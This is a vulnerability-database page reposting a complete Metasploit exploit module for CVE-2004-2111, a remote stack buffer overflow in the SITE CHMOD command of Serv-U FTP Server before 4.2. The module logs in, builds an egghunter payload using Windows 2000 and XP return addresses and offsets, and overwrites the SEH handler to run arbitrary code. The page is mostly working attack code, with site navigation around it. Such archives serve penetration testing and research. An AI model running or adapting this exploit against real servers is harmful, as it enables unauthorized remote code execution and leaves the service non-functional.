Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

RhinoSoft Serv-U FTPd Server < 4.2 - Remote Buffer Overflow (Metasploit)

Related Vulnerabilities: CVE-2004-2111  
Publish Date: 02 Dec 2011
Author: Metasploit
Source / Download Exploit 
                							

                ##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 &lt; Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Egghunter
	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           =&gt; 'Serv-U FTP Server &lt;4.2 Buffer Overflow',
			'Description'    =&gt; %q{
				This module exploits a stack buffer overflow in the site chmod command
				in versions of Serv-U FTP Server prior to 4.2.

				You must have valid credentials to trigger this vulnerability. Exploitation
				also leaves the service in a non-functional state.
			},
			'Author'         =&gt; 'thelightcosine &lt;thelightcosine[at]metasploit.com&gt;',
			'License'        =&gt; MSF_LICENSE,
			'Version'        =&gt; '$Revision$',
			'References'     =&gt;
				[
					[ 'CVE', '2004-2111'],
					[ 'BID', '9483'],
				],
			'Privileged'     =&gt; true,
			'DefaultOptions' =&gt;
				{
					'EXITFUNC' =&gt; 'thread',
				},
			'Payload'        =&gt;
				{
					'BadChars'    =&gt; "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
					'DisableNops' =&gt; true,
				},
			'Platform'       =&gt; 'win',
			'Targets'        =&gt;
				[
					[ 'Windows 2000 SP0-4 EN', {
						'Ret'    =&gt; 0x750212bc, #WS2HELP.DLL
						'Offset' =&gt; 396 } ],
					[ 'Windows XP SP0-1 EN', {
						'Ret'    =&gt; 0x71aa388f, #WS2HELP.DLL
						'Offset' =&gt; 394 } ]
				],
			'DisclosureDate' =&gt; 'Dec 31 2004',
			'DefaultTarget'  =&gt; 0))
	end

	def check
		connect
		disconnect

		if (banner =~ /Serv-U FTP Server v((4.(0|1))|3.\d)/)
			return Exploit::CheckCode::Vulnerable
		end
			return Exploit::CheckCode::Safe
	end


	def exploit
		connect_login

		eggoptions =
		{
			:checksum =&gt; true,
			:eggtag =&gt; "W00T"
		}

		hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions)


		buffer = "chmod 777 "
		buffer &lt;&lt;  make_nops(target['Offset'] - egg.length - hunter.length)
		buffer &lt;&lt; egg
		buffer &lt;&lt; hunter
		buffer &lt;&lt; "\xeb\xc9\x41\x41"	#nseh, jump back to egghunter
		buffer &lt;&lt; [target.ret].pack('V')	#seh
		buffer &lt;&lt; rand_text(5000)

		print_status("Trying target #{target.name}...")

		send_cmd( ['SITE', buffer] , false)

		handler
		disconnect
	end

end

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started